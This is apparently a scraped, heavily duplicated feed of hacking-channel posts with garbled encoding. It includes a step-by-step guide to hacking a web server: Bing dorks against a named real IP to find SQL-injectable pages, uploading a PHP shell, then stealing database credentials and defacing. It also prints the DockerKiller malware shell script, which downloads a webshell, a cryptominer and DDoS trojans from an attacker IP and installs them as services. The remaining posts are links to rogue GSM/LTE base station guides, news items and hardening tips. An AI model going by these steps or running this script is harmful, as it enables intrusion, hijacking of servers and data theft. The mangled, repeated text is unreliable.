π¦Web server attack tools
Some common Web server attack tools include:
1) Metasploit-This is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in Web servers and write vulnerabilities that can be used to compromise servers.
2) MPack-This is a web development tool. It is written in PHP and supported by MySQL as the database engine. After using MPack to attack the web server, all traffic will be redirected to the malicious download site.
3) Zeus-This tool can be used to turn infected computers into zombie programs or zombies. Zombie programs are infected computers used to perform Internet-based attacks. A botnet is a collection of infected computers. The botnet can then be used for denial of service attacks or sending spam.
4) Neosplit-This tool can be used to install programs, delete programs, copy programs, etc.
> all posted on @UndercodeTesting and you can install new updates
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Some common Web server attack tools include:
1) Metasploit-This is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in Web servers and write vulnerabilities that can be used to compromise servers.
2) MPack-This is a web development tool. It is written in PHP and supported by MySQL as the database engine. After using MPack to attack the web server, all traffic will be redirected to the malicious download site.
3) Zeus-This tool can be used to turn infected computers into zombie programs or zombies. Zombie programs are infected computers used to perform Internet-based attacks. A botnet is a collection of infected computers. The botnet can then be used for denial of service attacks or sending spam.
4) Neosplit-This tool can be used to install programs, delete programs, copy programs, etc.
> all posted on @UndercodeTesting and you can install new updates
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to avoid attacks on Web servers
> Organizations such undercode can adopt the following strategies to protect themselves against Web server attacks.
1) Patch management-This involves installing patches to help protect the server. Patches are updates that fix bugs in the software. Patches can be
2) applied to operating systems and Web server systems.
3) Safely install and configure the operating system
4) Safely install and configure Web server software
5) Vulnerability scanning system-including tools such as Snort, NMap,
6) Scanner Access Now Easy (SANE)
7) By blocking all traffic from the attacker's identified source IP address,
8) the firewall can be used to stop simple DoS attacks.
9) Antivirus software can be used to remove malware on the server
Disable remote management
10) The default account and unused accounts must be deleted from the system
11) The default port and settings (such as FTP for port 21) should be changed to custom ports and settings (FTP port is 5069)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to avoid attacks on Web servers
> Organizations such undercode can adopt the following strategies to protect themselves against Web server attacks.
1) Patch management-This involves installing patches to help protect the server. Patches are updates that fix bugs in the software. Patches can be
2) applied to operating systems and Web server systems.
3) Safely install and configure the operating system
4) Safely install and configure Web server software
5) Vulnerability scanning system-including tools such as Snort, NMap,
6) Scanner Access Now Easy (SANE)
7) By blocking all traffic from the attacker's identified source IP address,
8) the firewall can be used to stop simple DoS attacks.
9) Antivirus software can be used to remove malware on the server
Disable remote management
10) The default account and unused accounts must be deleted from the system
11) The default port and settings (such as FTP for port 21) should be changed to custom ports and settings (FTP port is 5069)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Information collected
1) We need to get the target's IP address, and find other sites that share the same IP address.
2) We will use an online tool to find the target IP address and other websites that share the IP address
3) Enter the URL http: // www. Yougetsignal.com/tools/ web-sites-on-web-server / in a web browser
Enter http: // www. Techpanda.orgAs a goal
π¦Information collected
1) We need to get the target's IP address, and find other sites that share the same IP address.
2) We will use an online tool to find the target IP address and other websites that share the IP address
3) Enter the URL http: // www. Yougetsignal.com/tools/ web-sites-on-web-server / in a web browser
Enter http: // www. Techpanda.orgAs a goal
Yougetsignal
Network Tools by YouGetSignal.com
A collection of uncomplicated, powerful network tools.
4) Based on the above results, the target's IP address is 69.195.124.112
5) We also found 403 domains on the same web server.
Our next step is to scan other sites for SQL injection vulnerabilities. Note: If we can find the vulnerable SQL on the target, then we will directly use it without considering other websites.
6) Enter the URL http: // www. Bing.com in a web browser. This only applies to Bing, so do nβt use other search engines such as Google or Yahoo
Enter the following search query
ip: 69.195.124.112.php? id =
5) We also found 403 domains on the same web server.
Our next step is to scan other sites for SQL injection vulnerabilities. Note: If we can find the vulnerable SQL on the target, then we will directly use it without considering other websites.
6) Enter the URL http: // www. Bing.com in a web browser. This only applies to Bing, so do nβt use other search engines such as Google or Yahoo
Enter the following search query
ip: 69.195.124.112.php? id =
7)
"Ip: 69.195.124.112" limits the search scope to all websites hosted on the web server with an IP address of 69.195.124.112
".Php? Id =" Search URL GET variable uses the parameters of the SQL statement.
You will get the following result
8) As can be seen from the above results, all websites that use GET variables as SQL injection parameters are listed.
9) The next logical step is to scan the listed websites for SQL injection vulnerabilities. You can use manual SQL injection or use the SQL injection tools listed in this article to do this.
10) When uploading PHP Shell (php Malaysia),
we will not scan any of the websites listed because this is illegal. We assume that we have managed to log into one of them. You must upload from http: // sourceforge.net/project s / icfdkshell /The downloaded PHP shell.
11) Open the URL to upload the dk.php file.
12) Clicking the symbolic link URL will allow you to access the file in the target domain.
13) Once you can access these files, you can get the login credentials of the database and perform any operations you want, such as defacement, downloading data such as emails, etc.
π¦ So we secure our servers in undercode using those tips + few more as summary i will present :
1) Web servers store valuable information and can be accessed by public domains. This makes them targets for attackers.
2) Commonly used Web servers include Apache and Internet Information Service IIS
3) Attacks on the web server take advantage of errors and misconfigurations in the operating system, web server and network
Popular web server hacking tools include Neosploit, MPack and ZeuS.
4) Good security strategy can reduce the possibility of being attacked
π¦Now we prepare a new hosting services in undercode, for online users with good prices, 2 months and will send site details..
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
"Ip: 69.195.124.112" limits the search scope to all websites hosted on the web server with an IP address of 69.195.124.112
".Php? Id =" Search URL GET variable uses the parameters of the SQL statement.
You will get the following result
8) As can be seen from the above results, all websites that use GET variables as SQL injection parameters are listed.
9) The next logical step is to scan the listed websites for SQL injection vulnerabilities. You can use manual SQL injection or use the SQL injection tools listed in this article to do this.
10) When uploading PHP Shell (php Malaysia),
we will not scan any of the websites listed because this is illegal. We assume that we have managed to log into one of them. You must upload from http: // sourceforge.net/project s / icfdkshell /The downloaded PHP shell.
11) Open the URL to upload the dk.php file.
12) Clicking the symbolic link URL will allow you to access the file in the target domain.
13) Once you can access these files, you can get the login credentials of the database and perform any operations you want, such as defacement, downloading data such as emails, etc.
π¦ So we secure our servers in undercode using those tips + few more as summary i will present :
1) Web servers store valuable information and can be accessed by public domains. This makes them targets for attackers.
2) Commonly used Web servers include Apache and Internet Information Service IIS
3) Attacks on the web server take advantage of errors and misconfigurations in the operating system, web server and network
Popular web server hacking tools include Neosploit, MPack and ZeuS.
4) Good security strategy can reduce the possibility of being attacked
π¦Now we prepare a new hosting services in undercode, for online users with good prices, 2 months and will send site details..
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WHAT IS DockerKiller:
>Recently, the Alibaba Cloud security team discovered the first instance of Docker batch attacks and utilization. After the attack, the attacker used IRC backdoors and webshell to achieve persistence, and performed mining, DDoS and other malicious actions on the host. With the gradual increase in the cost of attack and defense confrontation, the use of such attacks in the future may become more and more direct, and its use of cash out methods will also become multiple. It is recommended that enterprises strengthen the management of their edge applications and prevent threats caused by improper configuration.
> Docker is an open source application container engine that allows developers to package their applications and dependent packages into a portable container and publish it to any popular Linux machine for virtualization. Due to its very good portability, Docker is widely used in simplified configuration, rapid deployment, multi-tenant environment, and gradually used in production environment, and widely deployed on the cloud.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
>Recently, the Alibaba Cloud security team discovered the first instance of Docker batch attacks and utilization. After the attack, the attacker used IRC backdoors and webshell to achieve persistence, and performed mining, DDoS and other malicious actions on the host. With the gradual increase in the cost of attack and defense confrontation, the use of such attacks in the future may become more and more direct, and its use of cash out methods will also become multiple. It is recommended that enterprises strengthen the management of their edge applications and prevent threats caused by improper configuration.
> Docker is an open source application container engine that allows developers to package their applications and dependent packages into a portable container and publish it to any popular Linux machine for virtualization. Due to its very good portability, Docker is widely used in simplified configuration, rapid deployment, multi-tenant environment, and gradually used in production environment, and widely deployed on the cloud.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The function execution sequence is:
1)Clean up related files: Delete old versions of mining, DDoS Trojans, services and their configuration files
2) Download related files: download webshell backdoor, DDoS Trojan, mining program and execute
3) Open related services: open mining, DDoS Trojan services
1)Clean up related files: Delete old versions of mining, DDoS Trojans, services and their configuration files
2) Download related files: download webshell backdoor, DDoS Trojan, mining program and execute
3) Open related services: open mining, DDoS Trojan services
π¦The relevant Code is as follows:
#!/bin/sh
rm bashd.1;
rm xm.1;
rm data.cfg.1;
rm bashd.service.1;
rm xm.service.1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#!/bin/sh
rm bashd.1;
rm xm.1;
rm data.cfg.1;
rm bashd.service.1;
rm xm.service.1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Safety advice fro m undercode against DockerKiller :
1. Modify the default parameters of the Docker Remote API service (restart the service is required)
(1) Locate tcp: //0.0.0.0.2375 in DOCKER_OPTS and modify 0.0.0.0 to 127.0.0.1
(2) Or change the default port 2375 to a custom port
2. Set authentication measures for RemoteAPI (requires restart of service)
3. Modify the running account of the Docker service (restart the service is required)
Please run the Docker account with a lower-privilege account, this can restrict the attacker from executing high-risk commands
4. Set firewall policy
If the API service needs to be accessed by other servers in normal business, you can configure the security group policy or iptables policy to allow only the specified IP to access the Docker interface.
5. Use Alibaba Cloud Shield for detection and protection
Cloud Shield situational awareness supports the detection and protection of this vulnerability, you can open and use it in the Cloud Shield console
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Safety advice fro m undercode against DockerKiller :
1. Modify the default parameters of the Docker Remote API service (restart the service is required)
(1) Locate tcp: //0.0.0.0.2375 in DOCKER_OPTS and modify 0.0.0.0 to 127.0.0.1
(2) Or change the default port 2375 to a custom port
2. Set authentication measures for RemoteAPI (requires restart of service)
3. Modify the running account of the Docker service (restart the service is required)
Please run the Docker account with a lower-privilege account, this can restrict the attacker from executing high-risk commands
4. Set firewall policy
If the API service needs to be accessed by other servers in normal business, you can configure the security group policy or iptables policy to allow only the specified IP to access the Docker interface.
5. Use Alibaba Cloud Shield for detection and protection
Cloud Shield situational awareness supports the detection and protection of this vulnerability, you can open and use it in the Cloud Shield console
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Wolf malware launches attack again
reddit-hacker-data breach
> Android device users are being attacked by the upgraded version of DenDroid of "WolfRAT". Currently, it is mainly targeted at social software such as WhatsApp, Facebook Messenger and Line.
Β» The upgraded version is mainly operated by the infamous Wolf Research. The operation level is quite amateur, mainly for code overlap, copy and paste of open source projects, class instantiation, unstable program packaging and unsafe panel operation.
π¦Operation process
The malware imitates some legitimate service processes, such as Google services, GooglePlay or Flash updates. Its operation is mainly to copy and paste a large number of public resources on the network.
π¦The consequences
>After being publicly condemned by the Danish threat intelligence company CSIS Group, Wolf Research was closed but a new organization called LokD was established , which is dedicated to the security protection of Android devices. However, due to the sharing of devices and the forgotten name of the panel, we believe that the hackers of the organization are still active and are still in the process of developing malware.
>In addition, on the C2 panel we also found a potential connection between Wolf Research and another Cyprus organization called Coralco Tech, which is also conducting technical interception research.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Wolf malware launches attack again
reddit-hacker-data breach
> Android device users are being attacked by the upgraded version of DenDroid of "WolfRAT". Currently, it is mainly targeted at social software such as WhatsApp, Facebook Messenger and Line.
Β» The upgraded version is mainly operated by the infamous Wolf Research. The operation level is quite amateur, mainly for code overlap, copy and paste of open source projects, class instantiation, unstable program packaging and unsafe panel operation.
π¦Operation process
The malware imitates some legitimate service processes, such as Google services, GooglePlay or Flash updates. Its operation is mainly to copy and paste a large number of public resources on the network.
π¦The consequences
>After being publicly condemned by the Danish threat intelligence company CSIS Group, Wolf Research was closed but a new organization called LokD was established , which is dedicated to the security protection of Android devices. However, due to the sharing of devices and the forgotten name of the panel, we believe that the hackers of the organization are still active and are still in the process of developing malware.
>In addition, on the C2 panel we also found a potential connection between Wolf Research and another Cyprus organization called Coralco Tech, which is also conducting technical interception research.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ News by Undercode >Vulnerabilities in various DNS resolvers found to allow attackers to launch denial of service attacks :
t.me/UndercodeTesting
1) A vulnerability in the DNS resolver allows attackers to create denial of service conditions through packet amplification. The vulnerability is called NXNSAttack . The attacker abused the DNS delegation mechanism . The delegation it sent contained only the name of the authoritative DNS server but not its IP address.
2) The DNS resolver cannot send a domain name query to "name", so the resolver needs to obtain the IPv4 or IPv6 address of the authoritative DNS server before it can continue to query the domain name.
3) NXNSAttack is based on this principle. The commission sent by the attacker contains the fake authoritative server name, pointing to the victim's DNS server, forcing the resolver to generate a query to the victim's DNS server. A query will be amplified dozens or even hundreds of times, launching a denial of service attack on the victim's server.
4) Many DNS software are affected, including ISC BIND (CVE-2020-8616), NLnet labs Unbound (CVE-2020-12662), PowerDNS (CVE-2020-10995), CZ.NIC Knot Resolver (CVE-2020-12667 ), Cloudflare, Google, Amazon, Microsoft, Oracle (DYN), Verisign, IBM Quad9 and ICANN.β οΈβ οΈ
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ News by Undercode >Vulnerabilities in various DNS resolvers found to allow attackers to launch denial of service attacks :
t.me/UndercodeTesting
1) A vulnerability in the DNS resolver allows attackers to create denial of service conditions through packet amplification. The vulnerability is called NXNSAttack . The attacker abused the DNS delegation mechanism . The delegation it sent contained only the name of the authoritative DNS server but not its IP address.
2) The DNS resolver cannot send a domain name query to "name", so the resolver needs to obtain the IPv4 or IPv6 address of the authoritative DNS server before it can continue to query the domain name.
3) NXNSAttack is based on this principle. The commission sent by the attacker contains the fake authoritative server name, pointing to the victim's DNS server, forcing the resolver to generate a query to the victim's DNS server. A query will be amplified dozens or even hundreds of times, launching a denial of service attack on the victim's server.
4) Many DNS software are affected, including ISC BIND (CVE-2020-8616), NLnet labs Unbound (CVE-2020-12662), PowerDNS (CVE-2020-10995), CZ.NIC Knot Resolver (CVE-2020-12667 ), Cloudflare, Google, Amazon, Microsoft, Oracle (DYN), Verisign, IBM Quad9 and ICANN.β οΈβ οΈ
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Awesome-Cellular-Hacking - from random github repo tip :
1) How to create an Evil LTE Twin/LTE Rogue BTS How to setup a 4G/LTE Evil Twin Base Station using srsLTE and a USRP SDR device.
https://medium.com/@adam.toscher/how-to-create-an-evil-lte-twin-34b0a9ce193b
2) How To Build Your Own Rogue GSM BTS For Fun and Profit "In this blog post Iβm going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking β¦ yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception."
https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/
3) Practical attacks against GSM networks: Impersonation "Impersonating a cellular base station with SDR: With the flexibility, relative low cost of Software Defined Radio (SDR) and abundance of open source projects that emulate a cell tower, successfully impersonating a GSM Base Station (BTS) is not a difficult task these days."
> https://blog.blazeinfosec.com/practical-attacks-against-gsm-networks-part-1/
4) Building a Portable GSM BTS Using BladeRF/PI "I was always amazed when I read articles published by some hackers related to GSM technology. However, playing with GSM technologies was not cheap until the arrival of Software Defined Radios (SDRs), besides not being something easy to be implemented."
> https://blog.strcpy.info/2016/04/21/building-a-portable-gsm-bts-using-bladerf-raspberry-and-yatebts-the-definitive-guide/
5) rtl.sdr.com Tutorial-Analyzing GSM with-Airprobe and Wireshark "The RTL-SDR software defined radio can be used to analyze cellular phone GSM signals, using Linux based tools GR-GSM (or Airprobe) and Wireshark. This tutorial shows how to set up these tools for use with the RTL-SDR."
> https://www.rtl-sdr.com/rtl-sdr-tutorial-analyzing-gsm-with-airprobe-and-wireshark/
6) Traffic Interception for Penetration Testing Engagements "Within the penetration testing domain quite often we have to deal with different technologies and devices. Itβs important to cover all aspects of connectivity of a device being tested which is why we have built a GSM/GPRS interception capability. There are a number of different devices and systems that make use of GSM/GPRS, non-exhaustively we commonly see:"
>https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/may/gsmgprs-traffic-interception-for-penetration-testing-engagements/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Awesome-Cellular-Hacking - from random github repo tip :
1) How to create an Evil LTE Twin/LTE Rogue BTS How to setup a 4G/LTE Evil Twin Base Station using srsLTE and a USRP SDR device.
https://medium.com/@adam.toscher/how-to-create-an-evil-lte-twin-34b0a9ce193b
2) How To Build Your Own Rogue GSM BTS For Fun and Profit "In this blog post Iβm going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking β¦ yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception."
https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/
3) Practical attacks against GSM networks: Impersonation "Impersonating a cellular base station with SDR: With the flexibility, relative low cost of Software Defined Radio (SDR) and abundance of open source projects that emulate a cell tower, successfully impersonating a GSM Base Station (BTS) is not a difficult task these days."
> https://blog.blazeinfosec.com/practical-attacks-against-gsm-networks-part-1/
4) Building a Portable GSM BTS Using BladeRF/PI "I was always amazed when I read articles published by some hackers related to GSM technology. However, playing with GSM technologies was not cheap until the arrival of Software Defined Radios (SDRs), besides not being something easy to be implemented."
> https://blog.strcpy.info/2016/04/21/building-a-portable-gsm-bts-using-bladerf-raspberry-and-yatebts-the-definitive-guide/
5) rtl.sdr.com Tutorial-Analyzing GSM with-Airprobe and Wireshark "The RTL-SDR software defined radio can be used to analyze cellular phone GSM signals, using Linux based tools GR-GSM (or Airprobe) and Wireshark. This tutorial shows how to set up these tools for use with the RTL-SDR."
> https://www.rtl-sdr.com/rtl-sdr-tutorial-analyzing-gsm-with-airprobe-and-wireshark/
6) Traffic Interception for Penetration Testing Engagements "Within the penetration testing domain quite often we have to deal with different technologies and devices. Itβs important to cover all aspects of connectivity of a device being tested which is why we have built a GSM/GPRS interception capability. There are a number of different devices and systems that make use of GSM/GPRS, non-exhaustively we commonly see:"
>https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/may/gsmgprs-traffic-interception-for-penetration-testing-engagements/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Medium
How to create an EVIL LTE Twin
Be very careful when playing with any cellular bands. Denial of service attacks can have devastating and sometimes jail worthyβ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Installing a USRP Device on Linux :
1) sudo add-apt-repository ppa:ettusresearch/uhd
2) sudo apt-get update
3) sudo apt-get install libuhd-dev libuhd003 uhd-host
uhd_find_devices
4) cd /usr/lib/uhd/utils/
5) ./uhd_images_downloader.py
6) sudo uhd_usrp_probe
7) sudo uhd_usrp_probe
8) Example usage :
> [INFO] [UHD] linux; GNU C++ version 7.4.0; Boost_106501; UHD_3.14.1.1-release
[INFO] [B200] Detected Device: B*****
[INFO] [B200] Operating over USB 3.
[INFO] [B200] Initialize CODEC control...
[INFO] [B200] Initialize Radio control...
[INFO] [B200] Performing register loopback test...
[INFO] [B200] Register loopback test passed
[INFO] [B200] Setting master clock rate selection to 'automatic'.
[INFO] [B200] Asking for clock rate 16.000000 MHz...
[INFO] [B200] Actually got clock rate 16.000000 MHz.
_____________________________________________________
/
| Device: B-Series Device
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Installing a USRP Device on Linux :
1) sudo add-apt-repository ppa:ettusresearch/uhd
2) sudo apt-get update
3) sudo apt-get install libuhd-dev libuhd003 uhd-host
uhd_find_devices
4) cd /usr/lib/uhd/utils/
5) ./uhd_images_downloader.py
6) sudo uhd_usrp_probe
7) sudo uhd_usrp_probe
8) Example usage :
> [INFO] [UHD] linux; GNU C++ version 7.4.0; Boost_106501; UHD_3.14.1.1-release
[INFO] [B200] Detected Device: B*****
[INFO] [B200] Operating over USB 3.
[INFO] [B200] Initialize CODEC control...
[INFO] [B200] Initialize Radio control...
[INFO] [B200] Performing register loopback test...
[INFO] [B200] Register loopback test passed
[INFO] [B200] Setting master clock rate selection to 'automatic'.
[INFO] [B200] Asking for clock rate 16.000000 MHz...
[INFO] [B200] Actually got clock rate 16.000000 MHz.
_____________________________________________________
/
| Device: B-Series Device
β β β ο½ππ»βΊπ«Δπ¬πβ β β β